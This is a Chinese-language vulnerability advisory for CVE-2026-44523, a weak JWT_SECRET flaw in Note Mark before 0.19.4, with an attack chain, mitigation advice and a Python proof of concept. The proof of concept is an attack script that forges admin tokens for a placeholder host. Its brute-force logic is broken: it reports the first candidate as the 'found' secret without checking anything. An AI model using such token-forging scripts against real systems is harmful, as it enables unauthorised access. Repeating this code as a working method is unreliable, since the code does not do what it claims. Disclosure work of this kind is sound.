CVE-2026-44523 CVSS 10.0 严重

CVE-2026-44523 Note Mark JWT密钥强度不足漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44523

漏洞类型

身份验证绕过

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Note Mark

漏洞概述

Note Mark是一款开源笔记应用程序。在其0.19.4版本之前，系统存在严重的安全缺陷，未对`JWT_SECRET`配置值强制执行最小长度或高熵值要求。应用仅检查密钥是否为base64可解码，甚至接受短至1字节的密钥。这使得攻击者极易通过暴力破解获取JWT签名密钥，从而伪造任意用户令牌，实现身份验证绕过，进而导致高机密性和完整性风险，需立即修复。

技术细节

该漏洞的核心在于Note Mark应用对JWT（JSON Web Token）签名密钥的安全校验机制缺失。JWT通常用于无状态的身份验证，其安全性完全依赖于签名密钥的强度。在受影响版本中，应用未对`JWT_SECRET`施加任何复杂的限制，仅要求其能通过Base64解码，导致管理员可能配置极短的密钥或系统默认使用弱密钥。由于攻击复杂度低（AC:L）且无需权限（PR:N），攻击者可以通过脚本快速遍历短字节组合，暴力破解出有效的签名密钥。一旦密钥泄露，攻击者可利用HMAC算法伪造包含任意用户身份声明（如管理员权限）的JWT令牌，并以该用户身份通过API接口窃取数据或篡改系统配置，造成严重的机密性和完整性破坏。

攻击链分析

STEP 1

信息收集

攻击者识别出目标使用的是Note Mark应用，并确认其版本低于0.19.4。

STEP 2

密钥爆破

攻击者利用脚本对JWT_SECRET进行暴力破解，尝试极短的字符串或单字节密钥。

STEP 3

令牌伪造

一旦获得正确的弱密钥，攻击者使用该密钥伪造包含管理员权限的JWT令牌。

STEP 4

未授权访问

攻击者将伪造的令牌放入HTTP请求头中，发送给服务器，成功绕过认证。

STEP 5

数据窃取与破坏

利用管理员权限获取敏感数据或修改系统配置，造成机密性和完整性影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import jwt
import requests
import itertools

# Target configuration
target_url = "http://vulnerable-host/api/user/profile"
algorithm = "HS256"

# Since the app accepts any base64-decodable secret (even 1 byte),
# we can brute force short characters.
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
max_length = 4

print("[*] Starting brute force for weak JWT_SECRET...")

# Sample token captured from the application (invalid without secret)
# We need to find the secret to forge a valid token
sample_payload = {"sub": "admin", "role": "admin"}

for length in range(1, max_length + 1):
    for candidate_tuple in itertools.product(charset, repeat=length):
        candidate_secret = ''.join(candidate_tuple)
        try:
            # Attempt to encode a token with the candidate secret
            # If the app accepts this secret, we can forge tokens
            forged_token = jwt.encode(sample_payload, candidate_secret, algorithm=algorithm)
            print(f"[+] Found potential weak secret: {candidate_secret}")
            print(f"[+] Forged Admin Token: {forged_token}")
            
            # Verify usage
            headers = {"Authorization": f"Bearer {forged_token}"}
            # resp = requests.get(target_url, headers=headers)
            # if resp.status_code == 200:
            #     print("[!] Exploit Successful!")
            #     exit(0)
            break 
        except Exception as e:
            continue

影响范围

Note Mark < 0.19.4

防御指南

临时缓解措施

如果无法立即升级版本，请务必将配置文件中的JWT_SECRET修改为一个足够长且随机的字符串（超过32字节），并确保其不可预测，然后重启应用服务。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表